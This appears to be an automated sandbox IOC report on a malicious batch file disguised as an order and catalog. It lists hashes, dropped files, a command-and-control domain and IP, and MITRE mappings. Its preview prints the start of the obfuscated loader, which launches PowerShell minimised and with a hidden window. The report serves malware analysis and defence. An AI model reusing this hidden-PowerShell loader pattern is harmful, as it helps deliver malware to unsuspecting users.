Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

ORDER AND CATALOG 01.bat

ASCII text, with very long lines (7537), with no line terminators

initial sample

Details

Filetype:	ASCII text, with very long lines (7537), with no line terminators
Entropy:	5.284358476457278
Filename:	ORDER AND CATALOG 01.bat
Filesize:	7537
MD5:	48eb61ad0c88221857d8cf3e96d58525
SHA1:	724b144e7bbabd011ca04d0d140ede4e47e7ec71
SHA256:	fa9838f5471d4c21d2f8a2f6def009de4bcfad8e5794cc0be33b31e11c5d8fb9
SHA512:	5fb9dd301f5c1dce9a4f6ed005ccf970c3324702b1f5e3d49b130305293c4cc866ae19a2afe2d5dbd970652b533132bc41b5756d8140162d2967582504efeadd
SSDEEP:	96:wnhNRjujCEfr/W1RKU/Ak3Etp45oNUVNx1vlMcC4oxRpOw+Ad+VgaOJor/SyszCd:wnhnrED/qRX18qbx1vOrIyaO66UX6t5o
Preview:	start /min powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemicalization

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Extensible storage engine DataBase, version 0x620, checksum 0xb65c030d, page size 16384, DirtyShutdown, Windows version 10.0

dropped

Details

File:	C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Category:	dropped
Dump:	qmgr.db.5.dr
ID:	dr_5
Target ID:	5
Process:	C:\Windows\System32\svchost.exe
Type:	Extensible storage engine DataBase, version 0x620, checksum 0xb65c030d, page size 16384, DirtyShutdown, Windows version 10.0
Entropy:	0.7863983050932395
Encrypted:	false
Size:	1310720
Whitelisted:	false

Signature Hits	Behavior Group	Mitre Attack
Queries the volume information (name, serial number etc) of a device	Language, Device and Operating System Detection	System Information Discovery

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

data

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Category:	dropped
Dump:	ModuleAnalysisCache.11.dr
ID:	dr_6
Target ID:	11
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	4.840877972214509
Encrypted:	false
Size:	8003
Whitelisted:	false

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Category:	dropped
Dump:	StartupProfileData-NonInteractive.2.dr
ID:	dr_3
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	5.466962380449922
Encrypted:	false
Size:	18408
Whitelisted:	false

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltzeudcs.yp1.psm1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltzeudcs.yp1.psm1
Category:	dropped
Dump:	__PSScriptPolicyTest_ltzeudcs.yp1.psm1.2.dr
ID:	dr_1
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Size:	60
Whitelisted:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YR072N3QKOFFN5LUN1BZ.temp

data

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YR072N3QKOFFN5LUN1BZ.temp
Category:	dropped
Dump:	YR072N3QKOFFN5LUN1BZ.temp.2.dr
ID:	dr_0
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	3.7205877233899276
Encrypted:	false
Size:	6220
Whitelisted:	false

C:\Users\user\AppData\Roaming\Suspendibility.Lum

ASCII text, with very long lines (65536), with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Roaming\Suspendibility.Lum
Category:	dropped
Dump:	Suspendibility.Lum.2.dr
ID:	dr_2
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with very long lines (65536), with no line terminators
Entropy:	5.958394687358899
Encrypted:	false
Size:	467968
Whitelisted:	false

Signature Hits	Behavior Group	Mitre Attack
Creates files inside the user directory	System Summary	Masquerading

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

JSON data

dropped

Details

File:	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Category:	dropped
Dump:	Download-1.tmp.5.dr
ID:	dr_4
Target ID:	5
Process:	C:\Windows\System32\svchost.exe
Type:	JSON data
Entropy:	4.306461250274409
Encrypted:	false
Size:	55
Whitelisted:	false

Signature Hits	Behavior Group	Mitre Attack
Creates files inside the system directory	System Summary	Masquerading

Domains

Name

Malicious

cohabitais.ru.com

103.83.194.50

Details

Name:	cohabitais.ru.com
IP:	103.83.194.50
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Uses secure TLS version for HTTPS connections	Compliance, Networking

IPs

Domain

Country

Malicious

103.83.194.50

cohabitais.ru.com

United States

Details

IP:	103.83.194.50
TargetID:	2
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	United States
Countrycode:	USA
ASN number:	132335
ASN name:	NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN
Private:	false
Domain:	cohabitais.ru.com

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

127.0.0.1

unknown

23.218.208.109

unknown

United States

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
ORDER AND CATALOG 01.bat

Files

Domains

IPs

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportORDER AND CATALOG 01.bat

Files

Domains

IPs

IOC Report
ORDER AND CATALOG 01.bat